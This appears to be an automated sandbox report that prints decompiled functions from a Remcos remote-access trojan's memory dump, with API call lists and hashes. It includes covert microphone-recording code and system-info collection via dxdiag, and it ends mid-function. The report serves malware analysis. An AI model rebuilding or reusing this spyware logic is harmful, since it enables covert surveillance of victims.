                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$CreateDeleteExecuteShellSleep
                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                • API String ID: 1462127192-2001430897
                • Opcode ID: d88a2a61b45edcd269812ed728d67c50ffe2f582f56f68ab25c7f127d7968374
                • Instruction ID: c83c678f58a6655289b5cf6a6ce0edad258ffa977a2a4ba52374f317f639f8dc
                • Opcode Fuzzy Hash: d88a2a61b45edcd269812ed728d67c50ffe2f582f56f68ab25c7f127d7968374
                • Instruction Fuzzy Hash: F23150719401095ACB04FBA1DC96EEE7779AF50309F40017FF506731D2EE78598ACA9D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 91%
                			E00401CEB(void* __ebx, void* __edx, void* __edi, intOrPtr _a8) {
                				char _v84;
                				char _v112;
                				void* _v116;
                				char _v136;
                				void* _v140;
                				char _v160;
                				void* _v164;
                				char _v184;
                				void* _v188;
                				char _v204;
                				char _v208;
                				void* _v212;
                				char _v228;
                				char _v232;
                				char _v236;
                				void* __esi;
                				void* __ebp;
                				void* _t29;
                				intOrPtr _t43;
                				void* _t76;
                				void* _t79;
                
                				_t47 = __ebx;
                				_push(_t76);
                				E00401F66(__ebx,  &_v228);
                				_t84 = _a8 - 0x3c0;
                				if(_a8 == 0x3c0) {
                					E004016E7();
                					E00439269( &_v84, 0x50, "%Y-%m-%d %H.%M", E004016DF());
                					E00402073(__ebx,  &_v204, __edx, _t79,  &_v84);
                					_push(L".wav");
                					_t29 = E0041A7B9( &_v112,  &_v208);
                					E00401EF3( &_v232, _t31, _t76, E00402FF4(_t47,  &_v184, E00402F85( &_v160, E00402F52(__ebx,  &_v136, 0x472d40, _t79), 0x5c), __edi, _t79, _t84, _t29));
                					E00401EE9();
                					E00401EE9();
                					E00401EE9();
                					E00401EE9();
                					E00401FB8();
                					E00401A4D(E00401EE4( &_v236), 0x470a88);
                					waveInUnprepareHeader( *0x470ac0, 0x470a88, 0x20);
                					0x470a88->lpData = E00401F8B(0x472d58);
                					_t43 =  *0x470ac4; // 0x0
                					 *0x470a8c = _t43;
                					 *0x470a90 = 0;
                					 *0x470a94 = 0;
                					 *0x470a98 = 0;
                					 *0x470a9c = 0;
                					waveInPrepareHeader( *0x470ac0, 0x470a88, 0x20);
                					waveInAddBuffer( *0x470ac0, 0x470a88, 0x20);
                				}
                				return E00401EE9();
                			}

























                APIs
                • _strftime.LIBCMT ref: 00401D30
                  • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                • waveInUnprepareHeader.WINMM(00470A88,00000020,00000000,?), ref: 00401DE2
                • waveInPrepareHeader.WINMM(00470A88,00000020), ref: 00401E20
                • waveInAddBuffer.WINMM(00470A88,00000020), ref: 00401E2F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                • String ID: %Y-%m-%d %H.%M$.wav$@-G$X-G
                • API String ID: 3809562944-1740755071
                • Opcode ID: e0b355b770bc1730a0a616840a9c6e7c4d5febeab328e315ee3cdfcdd267426b
                • Instruction ID: 6e40445bcf9654caa432548e7993fb83a4077dca951e3b59059cc53d3c4022e6
                • Opcode Fuzzy Hash: e0b355b770bc1730a0a616840a9c6e7c4d5febeab328e315ee3cdfcdd267426b
                • Instruction Fuzzy Hash: 13317E315053019BC314FB66DC46A9E77E8EB94304F00893EF549A21F2EF789A49CB9E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E004103A4(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                				void* _v8;
                				char _v12;
                				char _v24;
                				void* __esi;
                				intOrPtr _t40;
                				void* _t48;
                				intOrPtr* _t51;
                
                				E00433BCB( &_v12, 0);
                				_t48 =  *0x474a74;
                				_v8 = _t48;
                				_t51 = E0040D696(_a4, E0040D5C5(0x470140));
                				if(_t51 != 0) {
                					L5:
                					E00433C23( &_v12);
                					return _t51;
                				} else {
                					if(_t48 == 0) {
                						__eflags = E0040D7AD(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
                						if(__eflags == 0) {
                							E0040D491( &_v24);
                							E004379F6( &_v24, 0x46cd4c);
                							asm("int3");
                							_t40 =  *((intOrPtr*)( *[fs:0x2c]));
                							__eflags =  *0x474a68 -  *((intOrPtr*)(_t40 + 4));
                							if( *0x474a68 >  *((intOrPtr*)(_t40 + 4))) {
                								_push(_t51);
                								E00432CF1(0x474a68);
                								__eflags =  *0x474a68 - 0xffffffff;
                								if( *0x474a68 == 0xffffffff) {
                									E0041074B();
                									E0043307B(__eflags, 0x456962);
                									E00432CB2(0x474a68, 0x474a68);
                								}
                							}
                							return 0x474a6c;
                						} else {
                							_t51 = _v8;
                							 *0x474a74 = _t51;
                							 *((intOrPtr*)( *_t51 + 4))();
                							E00433DDC(__eflags, _t51);
                							goto L5;
                						}
                					} else {
                						_t51 = _t48;
                						goto L5;
                					}
                				}
                			}











                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 004103B1
                • int.LIBCPMT ref: 004103C4
                  • Part of subcall function 0040D5C5: std::_Lockit::_Lockit.LIBCPMT ref: 0040D5D6
                  • Part of subcall function 0040D5C5: std::_Lockit::~_Lockit.LIBCPMT ref: 0040D5F0
                • std::_Facet_Register.LIBCPMT ref: 00410404
                • std::_Lockit::~_Lockit.LIBCPMT ref: 0041040D
                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041042B
                • __Init_thread_footer.LIBCMT ref: 0041046C
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                • String ID: hJG$lJG
                • API String ID: 3815856325-3986032958
                • Opcode ID: d4a0570ecbcf5ece8d5908e1c3d22f52c6d87fbfb43144eaa5cda1b4a7bc5fbd
                • Instruction ID: 6c6f380f6bf393aa298e891036efe52b613f3523a9b97c737d9d060c2d8c6b16
                • Opcode Fuzzy Hash: d4a0570ecbcf5ece8d5908e1c3d22f52c6d87fbfb43144eaa5cda1b4a7bc5fbd
                • Instruction Fuzzy Hash: 232108329402149BC710EBA9C9819EE73A89F84324F20466FF915A72D1DF7CAEC1C79D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0041BD68(void* __eflags) {
                				struct tagMSG _v32;
                				char _v300;
                				int _t14;
                
                				GetModuleFileNameA(0,  &_v300, 0x104);
                				 *0x472b24 = E0041BE1A();
                				0x472b20->cbSize = 0x1fc;
                				 *0x472b28 = 1;
                				 *0x472b30 = 0x401;
                				 *0x472b34 = ExtractIconA(0,  &_v300, 0);
                				lstrcpynA(0x472b38, "Remcos", 0x80);
                				 *0x472b2c = 7;
                				Shell_NotifyIconA(0, 0x472b20);
                				while(1) {
                					_t14 = GetMessageA( &_v32, 0, 0, 0);
                					if(_t14 == 0) {
                						break;
                					}
                					TranslateMessage( &_v32);
                					DispatchMessageA( &_v32);
                				}
                				return _t14;
                			}







                APIs
                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041BD81
                  • Part of subcall function 0041BE1A: RegisterClassExA.USER32(00000030), ref: 0041BE66
                  • Part of subcall function 0041BE1A: CreateWindowExA.USER32 ref: 0041BE81
                  • Part of subcall function 0041BE1A: GetLastError.KERNEL32 ref: 0041BE8B
                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041BDB8
                • lstrcpynA.KERNEL32(00472B38,Remcos,00000080), ref: 0041BDD2
                • Shell_NotifyIconA.SHELL32(00000000,00472B20), ref: 0041BDE8
                • TranslateMessage.USER32(?), ref: 0041BDF4
                • DispatchMessageA.USER32 ref: 0041BDFE
                • GetMessageA.USER32 ref: 0041BE0B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                • String ID: Remcos
                • API String ID: 1970332568-165870891
                • Opcode ID: 2d143759cf1fb37759ec7f404772a1ad4e1485a2e1ecf97a8841056aeb74ba0a
                • Instruction ID: 82a48a2e9b81ede311839844b2886800dd1b811866fb10484f52e0710d5afa0d
                • Opcode Fuzzy Hash: 2d143759cf1fb37759ec7f404772a1ad4e1485a2e1ecf97a8841056aeb74ba0a
                • Instruction Fuzzy Hash: BB013C71404304ABD7109FA1EE08EDB7BBCEB45715F00407AFA0492161D7B8A085CB6C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E0044B600(signed int _a4, void* _a8, unsigned int _a12) {
                				signed int _v5;
                				char _v6;
                				void* _v12;
                				unsigned int _v16;
                				signed int _v20;
                				signed int _v24;
                				signed int _v28;
                				void* _v32;
                				long _v36;
                				void* _v40;
                				long _v44;
                				signed int* _t143;
                				signed int _t145;
                				intOrPtr _t149;
                				signed int _t153;
                				signed int _t155;
                				signed char _t157;
                				unsigned int _t158;
                				intOrPtr _t162;
                				void* _t163;
                				signed int _t164;
                				signed int _t167;
                				long _t168;
                				intOrPtr _t175;
                				signed int _t176;
                				intOrPtr _t178;
                				signed int _t180;
                				signed int _t184;
                				char _t191;
                				char* _t192;
                				char _t199;
                				char* _t200;
                				signed char _t211;
                				signed int _t213;
                				long _t215;
                				signed int _t216;
                				char _t218;
                				signed char _t222;
                				signed int _t223;
                				unsigned int _t224;
                				intOrPtr _t225;
                				unsigned int _t229;
                				signed int _t231;
                				signed int _t232;
                				signed int _t233;
                				signed int _t234;
                				signed int _t235;
                				signed char _t236;
                				signed int _t237;
                				signed int _t239;
                				signed int _t240;
                				signed int _t241;
                				signed int _t242;
                				signed int _t246;
                				void* _t248;
                				void* _t249;
                
                				_t213 = _a4;
                				if(_t213 != 0xfffffffe) {
                					__eflags = _t213;
                					if(_t213 < 0) {
                						L58:
                						_t143 = E0043EE9A();
                						 *_t143 =  *_t143 & 0x00000000;
                						__eflags =  *_t143;
                						 *((intOrPtr*)(E0043EEAD())) = 9;
                						L59:
                						_t145 = E0043A5BB();
                						goto L60;
                					}
                					__eflags = _t213 -  *0x470a10; // 0x40
                					if(__eflags >= 0) {
                						goto L58;
                					}
                					_v24 = 1;
                					_t239 = _t213 >> 6;
                					_t235 = (_t213 & 0x0000003f) * 0x30;
                					_v20 = _t239;
                					_t149 =  *((intOrPtr*)(0x470810 + _t239 * 4));
                					_v28 = _t235;
                					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
                					_v5 = _t222;
                					__eflags = _t222 & 0x00000001;
                					if((_t222 & 0x00000001) == 0) {
                						goto L58;
                					}
                					_t223 = _a12;
                					__eflags = _t223 - 0x7fffffff;
                					if(_t223 <= 0x7fffffff) {
                						__eflags = _t223;
                						if(_t223 == 0) {
                							L57:
                							return 0;
                						}
                						__eflags = _v5 & 0x00000002;
                						if((_v5 & 0x00000002) != 0) {
                							goto L57;
                						}
                						__eflags = _a8;
                						if(_a8 == 0) {
                							goto L6;
                						}
                						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
                						_v5 = _t153;
                						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
                						_t246 = 0;
                						_t155 = _t153 - 1;
                						__eflags = _t155;
                						if(_t155 == 0) {
                							_t236 = _v24;
                							_t157 =  !_t223;
                							__eflags = _t236 & _t157;
                							if((_t236 & _t157) != 0) {
                								_t158 = 4;
                								_t224 = _t223 >> 1;
                								_v16 = _t158;
                								__eflags = _t224 - _t158;
                								if(_t224 >= _t158) {
                									_t158 = _t224;
                									_v16 = _t224;
                								}
                								_t246 = E00444A38(_t224, _t158);
                								E00445002(0);
                								E00445002(0);
                								_t249 = _t248 + 0xc;
                								_v12 = _t246;
                								__eflags = _t246;
                								if(_t246 != 0) {
                									_t162 = E0044AB6C(_t213, 0, 0, _v24);
                									_t225 =  *((intOrPtr*)(0x470810 + _t239 * 4));
                									_t248 = _t249 + 0x10;
                									_t240 = _v28;
                									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
                									_t163 = _t246;
                									 *(_t240 + _t225 + 0x24) = _t236;
                									_t235 = _t240;
                									_t223 = _v16;
                									L21:
                									_t241 = 0;
                									_v40 = _t163;
                									_t215 =  *((intOrPtr*)(0x470810 + _v20 * 4));
                									_v36 = _t215;
                									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
                									_t216 = _a4;
                									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
                										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
                										_v6 = _t218;
                										__eflags = _t218 - 0xa;
                										_t216 = _a4;
                										if(_t218 != 0xa) {
                											__eflags = _t223;
                											if(_t223 != 0) {
                												_t241 = _v24;
                												 *_t163 = _v6;
                												_t216 = _a4;
                												_t232 = _t223 - 1;
                												__eflags = _v5;
                												_v12 = _t163 + 1;
                												_v16 = _t232;
                												 *((char*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2a)) = 0xa;
                												if(_v5 != 0) {
                													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2b));
                													_v6 = _t191;
                													__eflags = _t191 - 0xa;
                													if(_t191 != 0xa) {
                														__eflags = _t232;
                														if(_t232 != 0) {
                															_t192 = _v12;
                															_t241 = 2;
                															 *_t192 = _v6;
                															_t216 = _a4;
                															_t233 = _t232 - 1;
                															_v12 = _t192 + 1;
                															_v16 = _t233;
                															 *((char*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2b)) = 0xa;
                															__eflags = _v5 - _v24;
                															if(_v5 == _v24) {
                																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2c));
                																_v6 = _t199;
                																__eflags = _t199 - 0xa;
                																if(_t199 != 0xa) {
                																	__eflags = _t233;
                																	if(_t233 != 0) {
                																		_t200 = _v12;
                																		_t241 = 3;
                																		 *_t200 = _v6;
                																		_t216 = _a4;
                																		_t234 = _t233 - 1;
                																		__eflags = _t234;
                																		_v12 = _t200 + 1;
                																		_v16 = _t234;
                																		 *((char*)(_t235 +  *((intOrPtr*)(0x470810 + _v20 * 4)) + 0x2c)) = 0xa;
                																	}
                																}
                															}
                														}
                													}
                												}
                											}
                										}
                									}
                									_t164 = E00453DF6(_t216);
                									__eflags = _t164;
                									if(_t164 == 0) {
                										L41:
                										_v24 = 0;
                										L42:
                										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
                										__eflags = _t167;
                										if(_t167 == 0) {
                											L53:
                											_t168 = GetLastError();
                											_t241 = 5;
                											__eflags = _t168 - _t241;
                											if(_t168 != _t241) {
                												__eflags = _t168 - 0x6d;
                												if(_t168 != 0x6d) {
                													L37:
                													E0043EE77(_t168);
                													goto L38;
                												}
                												_t242 = 0;
                												goto L39;
                											}
                											 *((intOrPtr*)(E0043EEAD())) = 9;
                											 *(E0043EE9A()) = _t241;
                											goto L38;
                										}
                										_t229 = _a12;
                										__eflags = _v36 - _t229;
                										if(_v36 > _t229) {
                											goto L53;
                										}
                										_t242 = _t241 + _v36;
                										__eflags = _t242;
                										L45:
                										_t237 = _v28;
                										_t175 =  *((intOrPtr*)(0x470810 + _v20 * 4));
                										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
                										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
                											__eflags = _v5 - 2;
                											if(_v5 == 2) {
                												__eflags = _v24;
                												_push(_t242 >> 1);
                												_push(_v40);
                												_push(_t216);
                												if(_v24 == 0) {
                													_t176 = E0044B15C();
                												} else {
                													_t176 = E0044B46C();
                												}
                											} else {
                												_t230 = _t229 >> 1;
                												__eflags = _t229 >> 1;
                												_t176 = E0044B31C(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
                											}
                											_t242 = _t176;
                										}
                										goto L39;
                									}
                									_t231 = _v28;
                									_t178 =  *((intOrPtr*)(0x470810 + _v20 * 4));
                									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
                									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
                										goto L41;
                									}
                									_t180 = GetConsoleMode(_v32,  &_v44);
                									__eflags = _t180;
                									if(_t180 == 0) {
                										goto L41;
                									}
                									__eflags = _v5 - 2;
                									if(_v5 != 2) {
                										goto L42;
                									}
                									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                									__eflags = _t184;
                									if(_t184 != 0) {
                										_t229 = _a12;
                										_t242 = _t241 + _v36 * 2;
                										goto L45;
                									}
                									_t168 = GetLastError();
                									goto L37;
                								} else {
                									 *((intOrPtr*)(E0043EEAD())) = 0xc;
                									 *(E0043EE9A()) = 8;
                									L38:
                									_t242 = _t241 | 0xffffffff;
                									__eflags = _t242;
                									L39:
                									E00445002(_t246);
                									return _t242;
                								}
                							}
                							L15:
                							 *(E0043EE9A()) =  *_t206 & _t246;
                							 *((intOrPtr*)(E0043EEAD())) = 0x16;
                							E0043A5BB();
                							goto L38;
                						}
                						__eflags = _t155 != 1;
                						if(_t155 != 1) {
                							L13:
                							_t163 = _a8;
                							_v16 = _t223;
                							_v12 = _t163;
                							goto L21;
                						}
                						_t211 =  !_t223;
                						__eflags = _t211 & 0x00000001;
                						if((_t211 & 0x00000001) == 0) {
                							goto L15;
                						}
                						goto L13;
                					}
                					L6:
                					 *(E0043EE9A()) =  *_t151 & 0x00000000;
                					 *((intOrPtr*)(E0043EEAD())) = 0x16;
                					goto L59;
                				} else {
                					 *(E0043EE9A()) =  *_t212 & 0x00000000;
                					_t145 = E0043EEAD();
                					 *_t145 = 9;
                					L60:
                					return _t145 | 0xffffffff;
                				}
                			}




























































                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 49796e171d8c6247e8b00cba545173f2417d4a934c5e5a2869158262b727af12
                • Instruction ID: bf7309e27d7813377405dfc29e16a9701e648260f6ca06a135f05bfcd2001108
                • Opcode Fuzzy Hash: 49796e171d8c6247e8b00cba545173f2417d4a934c5e5a2869158262b727af12
                • Instruction Fuzzy Hash: D2C108B0D04249AFEF11DFA9C841BAE7BB4EF09304F14409AE514A7392C778D941CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E00452603(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
                				signed int _v8;
                				char _v22;
                				struct _cpinfo _v28;
                				short* _v32;
                				int _v36;
                				char* _v40;
                				int _v44;
                				intOrPtr _v48;
                				void* _v60;
                				signed int _t63;
                				int _t70;
                				signed int _t72;
                				short* _t73;
                				signed int _t77;
                				short* _t87;
                				void* _t89;
                				void* _t92;
                				int _t99;
                				intOrPtr _t101;
                				intOrPtr _t102;
                				signed int _t112;
                				char* _t114;
                				char* _t115;
                				void* _t120;
                				void* _t121;
                				intOrPtr _t122;
                				intOrPtr _t123;
                				intOrPtr* _t125;
                				short* _t126;
                				int _t128;
                				int _t129;
                				short* _t130;
                				intOrPtr* _t131;
                				signed int _t132;
                				short* _t133;
                
                				_t63 =  *0x46f00c; // 0xd60a1515
                				_v8 = _t63 ^ _t132;
                				_t128 = _a20;
                				_v44 = _a4;
                				_v48 = _a8;
                				_t67 = _a24;
                				_v40 = _a24;
                				_t125 = _a16;
                				_v36 = _t125;
                				if(_t128 <= 0) {
                					if(_t128 >= 0xffffffff) {
                						goto L2;
                					} else {
                						goto L5;
                					}
                				} else {
                					_t128 = E00444FE6(_t125, _t128);
                					_t67 = _v40;
                					L2:
                					_t99 = _a28;
                					if(_t99 <= 0) {
                						if(_t99 < 0xffffffff) {
                							goto L5;
                						} else {
                							goto L7;
                						}
                					} else {
                						_t99 = E00444FE6(_t67, _t99);
                						L7:
                						_t70 = _a32;
                						if(_t70 == 0) {
                							_t70 =  *( *_v44 + 8);
                							_a32 = _t70;
                						}
                						if(_t128 == 0 || _t99 == 0) {
                							if(_t128 != _t99) {
                								if(_t99 <= 1) {
                									if(_t128 <= 1) {
                										if(GetCPInfo(_t70,  &_v28) == 0) {
                											goto L5;
                										} else {
                											if(_t128 <= 0) {
                												if(_t99 <= 0) {
                													goto L36;
                												} else {
                													_t89 = 2;
                													if(_v28 >= _t89) {
                														_t114 =  &_v22;
                														if(_v22 != 0) {
                															_t131 = _v40;
                															while(1) {
                																_t122 =  *((intOrPtr*)(_t114 + 1));
                																if(_t122 == 0) {
                																	goto L15;
                																}
                																_t101 =  *_t131;
                																if(_t101 <  *_t114 || _t101 > _t122) {
                																	_t114 = _t114 + _t89;
                																	if( *_t114 != 0) {
                																		continue;
                																	} else {
                																		goto L15;
                																	}
                																}
                																goto L63;
                															}
                														}
                													}
                													goto L15;
                												}
                											} else {
                												_t92 = 2;
                												if(_v28 >= _t92) {
                													_t115 =  &_v22;
                													if(_v22 != 0) {
                														while(1) {
                															_t123 =  *((intOrPtr*)(_t115 + 1));
                															if(_t123 == 0) {
                																goto L17;
                															}
                															_t102 =  *_t125;
                															if(_t102 <  *_t115 || _t102 > _t123) {
                																_t115 = _t115 + _t92;
                																if( *_t115 != 0) {
                																	continue;
                																} else {
                																	goto L17;
                																}
                															}
                															goto L63;
                														}
                													}
                												}
                												goto L17;
                											}
                										}
                									} else {
                										L17:
                										_push(3);
                										goto L13;
                									}
                								} else {
                									L15:
                								}
                							} else {
                								_push(2);
                								L13:
                							}
                						} else {
                							L36:
                							_t126 = 0;
                							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
                							_v44 = _t72;
                							if(_t72 == 0) {
                								L5:
                							} else {
                								_t120 = _t72 + _t72;
                								asm("sbb eax, eax");
                								if((_t120 + 0x00000008 & _t72) == 0) {
                									_t73 = 0;
                									_v32 = 0;
                									goto L45;
                								} else {
                									asm("sbb eax, eax");
                									_t85 = _t72 & _t120 + 0x00000008;
                									_t112 = _t120 + 8;
                									if((_t72 & _t120 + 0x00000008) > 0x400) {
                										asm("sbb eax, eax");
                										_t87 = E00444A38(_t112, _t85 & _t112);
                										_v32 = _t87;
                										if(_t87 == 0) {
                											goto L61;
                										} else {
                											 *_t87 = 0xdddd;
                											goto L43;
                										}
                									} else {
                										asm("sbb eax, eax");
                										E00455A90();
                										_t87 = _t133;
                										_v32 = _t87;
                										if(_t87 == 0) {
                											L61:
                											_t100 = _v32;
                										} else {
                											 *_t87 = 0xcccc;
                											L43:
                											_t73 =  &(_t87[4]);
                											_v32 = _t73;
                											L45:
                											if(_t73 == 0) {
                												goto L61;
                											} else {
                												_t129 = _a32;
                												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
                													goto L61;
                												} else {
                													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
                													_v36 = _t77;
                													if(_t77 == 0) {
                														goto L61;
                													} else {
                														_t121 = _t77 + _t77;
                														_t108 = _t121 + 8;
                														asm("sbb eax, eax");
                														if((_t121 + 0x00000008 & _t77) == 0) {
                															_t130 = _t126;
                															goto L56;
                														} else {
                															asm("sbb eax, eax");
                															_t81 = _t77 & _t121 + 0x00000008;
                															_t108 = _t121 + 8;
                															if((_t77 & _t121 + 0x00000008) > 0x400) {
                																asm("sbb eax, eax");
                																_t130 = E00444A38(_t108, _t81 & _t108);
                																_pop(_t108);
                																if(_t130 == 0) {
                																	goto L59;
                																} else {
                																	 *_t130 = 0xdddd;
                																	goto L54;
                																}
                															} else {
                																asm("sbb eax, eax");
                																E00455A90();
                																_t130 = _t133;
                																if(_t130 == 0) {
                																	L59:
                																	_t100 = _v32;
                																} else {
                																	 *_t130 = 0xcccc;
                																	L54:
                																	_t130 =  &(_t130[4]);
                																	L56:
                																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
                																		goto L59;
                																	} else {
                																		_t100 = _v32;
                																		_t126 = E00446EAF(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
                																	}
                																}
                															}
                														}
                														E00434713(_t130);
                													}
                												}
                											}
                										}
                									}
                								}
                								E00434713(_t100);
                							}
                						}
                					}
                				}
                				L63:
                				return E004338BB(_v8 ^ _t132);
                			}

                APIs
                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004528DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 004526AF
                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004528DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00452732
                • __alloca_probe_16.LIBCMT ref: 0045276A
                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004528DC,?,004528DC,00000000,00000000,?,00000001,?,?,?,?), ref: 004527C5
                • __alloca_probe_16.LIBCMT ref: 00452814
                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004528DC,00000000,00000000,?,00000001,?,?,?,?), ref: 004527DC
                  • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004528DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00452858
                • __freea.LIBCMT ref: 00452883
                • __freea.LIBCMT ref: 0045288F
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                • String ID:
                • API String ID: 201697637-0
                • Opcode ID: 869e1f5eeb49bbb079ea2563c9337cb9b33b60cafbe4efd3de06afce2afdede7
                • Instruction ID: ccc14fa8acdac63bc9519f5215d42201de6c5a87ae6f625bde0ffe2347fa224d
                • Opcode Fuzzy Hash: 869e1f5eeb49bbb079ea2563c9337cb9b33b60cafbe4efd3de06afce2afdede7
                • Instruction Fuzzy Hash: 07911871E002169BDF249EA5C981EEF7BB59F4A311F18062BEC00E7242D779CC498768
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E00443A7A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                				signed int _v8;
                				short _v270;
                				short _v272;
                				char _v528;
                				char _v700;
                				signed int _v704;
                				signed int _v708;
                				short _v710;
                				signed int* _v712;
                				signed int _v716;
                				signed int _v720;
                				signed int _v724;
                				signed int* _v728;
                				signed int _v732;
                				signed int _v736;
                				signed int _v740;
                				signed int _v744;
                				signed int _t149;
                				void* _t156;
                				signed int _t157;
                				signed int _t158;
                				intOrPtr _t159;
                				signed int _t162;
                				signed int _t166;
                				signed int _t167;
                				intOrPtr _t169;
                				signed int _t172;
                				signed int _t173;
                				signed int _t175;
                				signed int _t195;
                				signed int _t196;
                				signed int _t199;
                				signed int _t204;
                				signed int _t207;
                				intOrPtr* _t213;
                				intOrPtr* _t214;
                				signed int _t225;
                				signed int _t228;
                				intOrPtr* _t229;
                				signed int _t231;
                				signed int* _t235;
                				void* _t243;
                				signed int _t244;
                				intOrPtr _t246;
                				signed int _t251;
                				signed int _t253;
                				signed int _t257;
                				signed int* _t258;
                				intOrPtr* _t259;
                				short _t260;
                				signed int _t262;
                				signed int _t264;
                				void* _t266;
                				void* _t268;
                
                				_t262 = _t264;
                				_t149 =  *0x46f00c; // 0xd60a1515
                				_v8 = _t149 ^ _t262;
                				_push(__ebx);
                				_t207 = _a8;
                				_push(__esi);
                				_push(__edi);
                				_t246 = _a4;
                				_v744 = _t207;
                				_v728 = E00446A95(_t207, __ecx, __edx) + 0x278;
                				_push( &_v708);
                				_t156 = E004431C4(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
                				_t266 = _t264 - 0x2e4 + 0x18;
                				if(_t156 != 0) {
                					_t11 = _t207 + 2; // 0x6
                					_t251 = _t11 << 4;
                					__eflags = _t251;
                					_t157 =  &_v272;
                					_v716 = _t251;
                					_t213 =  *((intOrPtr*)(_t251 + _t246));
                					while(1) {
                						_v704 = _v704 & 0x00000000;
                						__eflags =  *_t157 -  *_t213;
                						_t253 = _v716;
                						if( *_t157 !=  *_t213) {
                							break;
                						}
                						__eflags =  *_t157;
                						if( *_t157 == 0) {
                							L8:
                							_t158 = _v704;
                						} else {
